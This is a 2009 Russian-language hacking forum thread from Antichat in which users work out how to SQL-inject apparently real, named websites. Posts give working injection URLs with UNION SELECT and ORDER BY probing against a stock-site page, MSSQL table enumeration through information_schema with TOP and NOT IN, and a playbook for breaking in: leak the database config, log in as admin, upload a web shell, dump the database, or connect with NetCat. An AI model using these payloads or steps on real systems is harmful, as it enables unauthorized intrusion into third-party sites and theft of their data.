Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.11.2009, 12:45
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Krist_ALL
смотри как инекции проводить в mssql
Microsoft Access Driver
|
|
|
10.11.2009, 12:46
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Сообщение от Krist_ALL
MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.
Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'
смотри как инекции проводить в mssql
Какой mssql??
ODBC API call: 'statement executeDirect:' returned the following error message: '
{execDirect}[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Symbol = ''' ORDER BY ID'. (sqlState: 37000)
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID
При чем здесь MSSQL ?
|
|
|
|
10.11.2009, 12:48
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
т.е. актино приниается, или редко встречается ? (по сравнение SQL инекции)
Зайди в тему "Энциклопедия уязвимых скриптов" да и посмотри
(имхо sql-inj чаще встречается)
на сколько понял - о сливи БД тут речь не может идти.. это уже SQL инекцями, да?
Почему это?
1. Сливаешь конфиг файл для подкл. к БД, смотришь пароль, пробуешь зайти под админом и под паролем который был в конфиге к примеру на форум, если захошел то заливаешь шелл и потом сливаешь БД через шелл
2. Если сервис sql доступен из интернета то просто подкл. к нему с помощью какой либо утилиты (я для этого юзаю NetCat)
про LFI/RFI-уязвимости читал ЗДЕСЬ , но не очень понятно был что, зачем и как.. попробую еще искать ...
Ну ты думаешь своей головою? Тебе надо искать мануалы по lfi/rfi а не уязвимости в движках (я понимаю что хочется понять вот так сразу но надо с мануалов начинать)
|
|
|
|
10.11.2009, 12:48
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
перепутал))
суть в том что сайт сам не пашет.
Последний раз редактировалось Krist_ALL; 10.11.2009 в 12:51..
|
|
|
|
10.11.2009, 15:52
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Krist_ALL
MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.
Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'
+ EwXx08.120@Windows 2000 5.0)
смотри как инекции проводить в mssql
гыгы сайт то не пашет http://wallstreetcorner.com/ss2.htm
и даже при http://wallstreetcorner.com/ss2.html?Symbol=1 ошибка)
я уже пробовал стандартные методы инъекций
Код:
http://wallstreetcorner.com/disclaimer.html?Symbol=' пашет
|
|
|
|
10.11.2009, 16:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
http://wallstreetcorner.com/disclaimer.html?Symbol='+order+by+45,46,47,48,49,5 0+union+select+1+from+Situations+where+'1
& use https://forum.antichat.ru/thread50550.html
/add краткость сестра таланта:
http://wallstreetcorner.com/disclaimer.html?Symbol='order+by+47%00
Последний раз редактировалось l1ght; 10.11.2009 в 16:34..
|
|
|
|
10.11.2009, 18:57
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
http://www.site.com/ShopList.asp?Cat=-34+union+select+1,2,3,4,5,6,table_name,8+from+info rmation_schema.tables--
Получил таблицу MyAccessLog БД MS SQL,в мускуле используется лимит,а сдесь как сделать чтобы получить имена остальных таблиц?Пробовал как в статьях 1 or 1=@@version-- и тд,запросы такие неработают.
|
|
|
|
10.11.2009, 19:32
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
2Fed123,
cat=-1+union+select+top+1+1,2,3,4,5,6,table_name,8+from +information_schema.tables+where+table_name+not+in +(select+top+1+table_name+from+information_schema.tables)--
Хм ну как-то так вроде, поэкспериментируй
|
|
|
|
10.11.2009, 19:44
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
where table_name NOT IN ('table_name1')
|
|
|
|
10.11.2009, 19:48
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от l1ght
http://wallstreetcorner.com/disclaimer.html?Symbol='+order+by+45,46,47,48,49,5 0+union+select+1+from+Situations+where+'1
& use https://forum.antichat.ru/thread50550.html
/add краткость сестра таланта:
http://wallstreetcorner.com/disclaimer.html?Symbol='order+by+47%00
спс |1ght я уже много раз прочитал ту статью. Твой линк помоему ничего не изменил вроде. Неужели от явного скуля нельзя что то делать?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
